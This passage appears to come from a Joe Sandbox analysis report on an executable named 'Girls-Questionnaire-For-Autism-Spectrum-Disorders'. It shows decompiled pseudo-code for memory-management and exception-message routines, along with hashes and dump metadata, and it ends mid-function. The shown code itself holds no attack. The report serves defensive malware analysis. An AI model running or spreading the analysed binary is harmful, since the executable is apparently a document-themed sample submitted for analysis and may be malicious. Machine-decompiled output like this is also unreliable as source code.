                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 135118572-0
                                                                                              • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                                              • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                                                              • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                                              • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404464, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 88%
                                                                                              			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00403EE8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E00403AA4(_t202, _t218, _t150);
										E0040426C(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00403EE8(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E0040426C(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00403A74(_t217, _t207, _t109);
									E0040426C(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4bb059;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E00403AC0(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E00403B00(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4bbae8 = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4bbae8 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4bb059;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E00403AC0(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00403B00(_t217 + _t238, _t174, _t161);
									}
									 *0x4bbae8 = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00403EE8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E00403AA4(_t217, _t213, _t140);
											E0040426C(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00403EE8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00403EE8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E0040426C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                                                              0x00404464
                                                                                              0x00404464
                                                                                              0x00404464
                                                                                              0x0040446c
                                                                                              0x0040446e
                                                                                              0x004044fc
                                                                                              0x004044ff
                                                                                              0x0040476c
                                                                                              0x0040476d
                                                                                              0x0040476e
                                                                                              0x00404771
                                                                                              0x00403d9c
                                                                                              0x00403d9d
                                                                                              0x00403d9e
                                                                                              0x00403d9f
                                                                                              0x00403da0
                                                                                              0x00403da3
                                                                                              0x00403da5
                                                                                              0x00403dac
                                                                                              0x00403db5
                                                                                              0x00403dba
                                                                                              0x00403ea1
                                                                                              0x00403ea3
                                                                                              0x00403eb6
                                                                                              0x00403eb8
                                                                                              0x00403eba
                                                                                              0x00403ebc
                                                                                              0x00403ec2
                                                                                              0x00403ec6
                                                                                              0x00403ec6
                                                                                              0x00403ec9
                                                                                              0x00403ec9
                                                                                              0x00403ed2
                                                                                              0x00403ed9
                                                                                              0x00403ed9
                                                                                              0x00403ea5
                                                                                              0x00403ea5
                                                                                              0x00403eaa
                                                                                              0x00403eaa
                                                                                              0x00403dc0
                                                                                              0x00403dc9
                                                                                              0x00403dcf
                                                                                              0x00403dcb
                                                                                              0x00403dcb
                                                                                              0x00403dcb
                                                                                              0x00403ddb
                                                                                              0x00403dea
                                                                                              0x00403df7
                                                                                              0x00403e67
                                                                                              0x00403e6e
                                                                                              0x00403e70
                                                                                              0x00403e72
                                                                                              0x00403e74
                                                                                              0x00403e7a
                                                                                              0x00403e7e
                                                                                              0x00403e7e
                                                                                              0x00403e81
                                                                                              0x00403e81
                                                                                              0x00403e91
                                                                                              0x00403e98
                                                                                              0x00403e98
                                                                                              0x00403df9
                                                                                              0x00403df9
                                                                                              0x00403e05
                                                                                              0x00403e0b
                                                                                              0x00000000
                                                                                              0x00403e0d
                                                                                              0x00403e1e
                                                                                              0x00403e22
                                                                                              0x00403e24
                                                                                              0x00403e24
                                                                                              0x00403e3a
                                                                                              0x00000000
                                                                                              0x00403e52
                                                                                              0x00403e54
                                                                                              0x00403e57
                                                                                              0x00403e60
                                                                                              0x00403e63
                                                                                              0x00403e63
                                                                                              0x00403e3a
                                                                                              0x00403e0b
                                                                                              0x00403df7
                                                                                              0x00403ee7
                                                                                              0x00404777
                                                                                              0x00404777
                                                                                              0x00404779
                                                                                              0x00404779
                                                                                              0x00404505
                                                                                              0x00404507
                                                                                              0x0040450a
                                                                                              0x0040450b
                                                                                              0x0040450e
                                                                                              0x00404511
                                                                                              0x00404514
                                                                                              0x00404516
                                                                                              0x00404517
                                                                                              0x0040462c
                                                                                              0x0040462f
                                                                                              0x00404631
                                                                                              0x00404724
                                                                                              0x0040472f
                                                                                              0x00404736
                                                                                              0x00404738
                                                                                              0x0040473b
                                                                                              0x00404740
                                                                                              0x00404741
                                                                                              0x00404743
                                                                                              0x00000000
                                                                                              0x00404745
                                                                                              0x00404745
                                                                                              0x0040474b
                                                                                              0x0040474d
                                                                                              0x0040474d
                                                                                              0x00404750
                                                                                              0x00404758
                                                                                              0x0040475f
                                                                                              0x0040476a
                                                                                              0x0040476a
                                                                                              0x00404637
                                                                                              0x00404637
                                                                                              0x0040463a
                                                                                              0x0040463d
                                                                                              0x0040463f
                                                                                              0x00000000
                                                                                              0x00404645
                                                                                              0x00404645
                                                                                              0x0040464c
                                                                                              0x004046a9
                                                                                              0x004046a9
                                                                                              0x004046ae
                                                                                              0x004046b4
                                                                                              0x004046b9
                                                                                              0x004046ba
                                                                                              0x004046ba
                                                                                              0x004046c6
                                                                                              0x004046d7
                                                                                              0x004046dd
                                                                                              0x004046dd
                                                                                              0x004046df
                                                                                              0x004046ec
                                                                                              0x004046f3
                                                                                              0x004046f7
                                                                                              0x004046f9
                                                                                              0x004046ff
                                                                                              0x00404701
                                                                                              0x00404703
                                                                                              0x00404703
                                                                                              0x004046e1
                                                                                              0x004046e1
                                                                                              0x004046e5
                                                                                              0x004046e5
                                                                                              0x00404708
                                                                                              0x00404708
                                                                                              0x0040470a
                                                                                              0x0040470d
                                                                                              0x00404714
                                                                                              0x00404716
                                                                                              0x0040471a
                                                                                              0x0040464e
                                                                                              0x0040464e
                                                                                              0x00404653
                                                                                              0x0040465b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040465d
                                                                                              0x0040465f
                                                                                              0x00404666
                                                                                              0x00000000
                                                                                              0x00404668
                                                                                              0x0040466c
                                                                                              0x00404671
                                                                                              0x00404672
                                                                                              0x00404678
                                                                                              0x00404680
                                                                                              0x00404686
                                                                                              0x0040468b
                                                                                              0x0040468c
                                                                                              0x00000000
                                                                                              0x0040468c
                                                                                              0x00404680
                                                                                              0x00000000
                                                                                              0x00404666
                                                                                              0x00404695
                                                                                              0x00404698
                                                                                              0x0040469b
                                                                                              0x0040469d
                                                                                              0x0040471d
                                                                                              0x0040471d
                                                                                              0x00000000
                                                                                              0x0040469f
                                                                                              0x0040469f
                                                                                              0x004046a2
                                                                                              0x004046a5
                                                                                              0x004046a7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004046a7
                                                                                              0x0040469d
                                                                                              0x0040464c
                                                                                              0x0040463f
                                                                                              0x0040451d
                                                                                              0x00404520
                                                                                              0x00404522
                                                                                              0x0040452c
                                                                                              0x00404532
                                                                                              0x00404549
                                                                                              0x00404549
                                                                                              0x00404555
                                                                                              0x0040455b
                                                                                              0x0040455d
                                                                                              0x00404564
                                                                                              0x00404566
                                                                                              0x0040456b
                                                                                              0x00404573
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404575
                                                                                              0x00404577
                                                                                              0x0040457e
                                                                                              0x00000000
                                                                                              0x00404580
                                                                                              0x00404583
                                                                                              0x00404588
                                                                                              0x0040458e
                                                                                              0x00404596
                                                                                              0x0040459b
                                                                                              0x004045a0
                                                                                              0x00000000
                                                                                              0x004045a0
                                                                                              0x00404596
                                                                                              0x00000000
                                                                                              0x0040457e
                                                                                              0x004045a9
                                                                                              0x004045a9
                                                                                              0x004045a9
                                                                                              0x004045ae
                                                                                              0x004045b1
                                                                                              0x004045b3
                                                                                              0x004045b6
                                                                                              0x004045b9
                                                                                              0x004045c4
                                                                                              0x004045c6
                                                                                              0x004045c9
                                                                                              0x004045cb
                                                                                              0x004045cd
                                                                                              0x004045d3
                                                                                              0x004045d5
                                                                                              0x004045d5
                                                                                              0x004045bb
                                                                                              0x004045be
                                                                                              0x004045be
                                                                                              0x004045da
                                                                                              0x004045e0
                                                                                              0x004045e4
                                                                                              0x004045ea
                                                                                              0x004045f1
                                                                                              0x004045f1
                                                                                              0x004045f6
                                                                                              0x00404603
                                                                                              0x00404534
                                                                                              0x00404534
                                                                                              0x0040453a
                                                                                              0x00404604
                                                                                              0x00404608
                                                                                              0x0040460d
                                                                                              0x0040460f
                                                                                              0x00404611
                                                                                              0x00404619
                                                                                              0x00404620
                                                                                              0x00404625
                                                                                              0x00404625
                                                                                              0x0040462b
                                                                                              0x00404540
                                                                                              0x00404540
                                                                                              0x00404545
                                                                                              0x00404547
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404547
                                                                                              0x0040453a
                                                                                              0x00404524
                                                                                              0x00404524
                                                                                              0x00404528
                                                                                              0x00404528
                                                                                              0x00404522
                                                                                              0x00404517
                                                                                              0x00404474
                                                                                              0x00404474
                                                                                              0x00404476
                                                                                              0x0040447a
                                                                                              0x0040447d
                                                                                              0x0040447f
                                                                                              0x004044b8
                                                                                              0x004044bc
                                                                                              0x004044bd
                                                                                              0x004044bf
                                                                                              0x004044c1
                                                                                              0x004044c3
                                                                                              0x004044c6
                                                                                              0x004044c8
                                                                                              0x004044ca
                                                                                              0x004044cf
                                                                                              0x004044d1
                                                                                              0x004044d3
                                                                                              0x004044d9
                                                                                              0x004044db
                                                                                              0x004044db
                                                                                              0x004044e2
                                                                                              0x004044e2
                                                                                              0x004044e5
                                                                                              0x004044e7
                                                                                              0x004044f0
                                                                                              0x004044f5
                                                                                              0x004044f5
                                                                                              0x004044f7
                                                                                              0x004044f8
                                                                                              0x004044f9
                                                                                              0x004044fa
                                                                                              0x00404481
                                                                                              0x00404481
                                                                                              0x00404488
                                                                                              0x0040448a
                                                                                              0x00404490
                                                                                              0x00404492
                                                                                              0x00404494
                                                                                              0x00404499
                                                                                              0x0040449b
                                                                                              0x0040449d
                                                                                              0x0040449f
                                                                                              0x004044a1
                                                                                              0x004044ac
                                                                                              0x004044b1
                                                                                              0x004044b1
                                                                                              0x004044b3
                                                                                              0x004044b4
                                                                                              0x004044b5
                                                                                              0x0040448c
                                                                                              0x0040448c
                                                                                              0x0040448d
                                                                                              0x0040448e
                                                                                              0x0040448e
                                                                                              0x0040448a
                                                                                              0x0040447f

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                                              • Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
                                                                                              • Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                                              • Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041F7A0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 68%
                                                                                              			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				void* _t64;
				intOrPtr _t65;
				long _t76;
				intOrPtr _t82;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t127;
				void* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t143;

				_t136 = __edi;
				_t140 = _t141;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t141);
				_push(0x41f9a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xfffffd8c;
				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
				_t143 = _t64;
				if(_t143 < 0) {
					_t65 =  *0x4ba798; // 0x40e730
					E0040C9F0(_t65,  &_v8, _t140);
				} else {
					if(_t143 == 0) {
						_t107 =  *0x4ba670; // 0x40e738
						E0040C9F0(_t107,  &_v8, _t140);
					} else {
						if(_t64 == 7) {
							_t110 =  *0x4ba4d0; // 0x40e740
							E0040C9F0(_t110,  &_v8, _t140);
						} else {
							_t112 =  *0x4ba5c8; // 0x40e748
							E0040C9F0(_t112,  &_v8, _t140);
						}
					}
				}
				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
				_t138 = _v36.State;
				if(_t138 == 0x1000 || _t138 == 0x10000) {
					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
					_t147 = _t76;
					if(_t76 == 0) {
						goto L12;
					} else {
						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
						_v588 = 5;
						E0040858C( &_v600, 0x105,  &_v558);
						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
						_v584 = _v596;
						_v580 = 0x11;
						_v576 = _v8;
						_v572 = 0x11;
						_v568 = _t115;
						_v564 = 5;
						_push( &_v592);
						_t103 =  *0x4ba6e0; // 0x40e810
						E0040C9F0(_t103,  &_v604, _t140, 3);
						E0041F2A0(_t115, _v604, 1, _t136, _t138);
					}
				} else {
					L12:
					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t115;
					_v608 = 5;
					_push( &_v628);
					_t82 =  *0x4ba67c; // 0x40e6d8
					E0040C9F0(_t82,  &_v632, _t140, 2);
					E0041F2A0(_t115, _v632, 1, _t136, _t138);
				}
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(0x41f9ad);
				E00407A20( &_v632);
				E00407A80( &_v604, 3);
				return E00407A20( &_v8);
			}






































                                                                                              0x0041f7a0
                                                                                              0x0041f7a1
                                                                                              0x0041f7ad
                                                                                              0x0041f7b3
                                                                                              0x0041f7b9
                                                                                              0x0041f7bf
                                                                                              0x0041f7c5
                                                                                              0x0041f7ca
                                                                                              0x0041f7cb
                                                                                              0x0041f7d0
                                                                                              0x0041f7d3
                                                                                              0x0041f7df
                                                                                              0x0041f7df
                                                                                              0x0041f7e2
                                                                                              0x0041f7f0
                                                                                              0x0041f7f5
                                                                                              0x0041f7e4
                                                                                              0x0041f7e4
                                                                                              0x0041f7ff
                                                                                              0x0041f804
                                                                                              0x0041f7e6
                                                                                              0x0041f7e9
                                                                                              0x0041f80e
                                                                                              0x0041f813
                                                                                              0x0041f7eb
                                                                                              0x0041f81d
                                                                                              0x0041f822
                                                                                              0x0041f822
                                                                                              0x0041f7e9
                                                                                              0x0041f7e4
                                                                                              0x0041f82d
                                                                                              0x0041f840
                                                                                              0x0041f845
                                                                                              0x0041f84e
                                                                                              0x0041f86c
                                                                                              0x0041f871
                                                                                              0x0041f873
                                                                                              0x00000000
                                                                                              0x0041f879
                                                                                              0x0041f882
                                                                                              0x0041f888
                                                                                              0x0041f8a0
                                                                                              0x0041f8b1
                                                                                              0x0041f8bc
                                                                                              0x0041f8c2
                                                                                              0x0041f8cc
                                                                                              0x0041f8d2
                                                                                              0x0041f8d9
                                                                                              0x0041f8df
                                                                                              0x0041f8ec
                                                                                              0x0041f8f5
                                                                                              0x0041f8fa
                                                                                              0x0041f90c
                                                                                              0x0041f911
                                                                                              0x0041f915
                                                                                              0x0041f915
                                                                                              0x0041f91e
                                                                                              0x0041f924
                                                                                              0x0041f92e
                                                                                              0x0041f934
                                                                                              0x0041f93b
                                                                                              0x0041f941
                                                                                              0x0041f94e
                                                                                              0x0041f957
                                                                                              0x0041f95c
                                                                                              0x0041f96e
                                                                                              0x0041f973
                                                                                              0x0041f977
                                                                                              0x0041f97a
                                                                                              0x0041f97d
                                                                                              0x0041f988
                                                                                              0x0041f998
                                                                                              0x0041f9a5

                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                                                                • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                              • String ID: 0@$8@$@@$H@
                                                                                              • API String ID: 902310565-4161625419
                                                                                              • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                                              • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                                                              • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                                              • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406688, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 88%
                                                                                              			E00406688(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
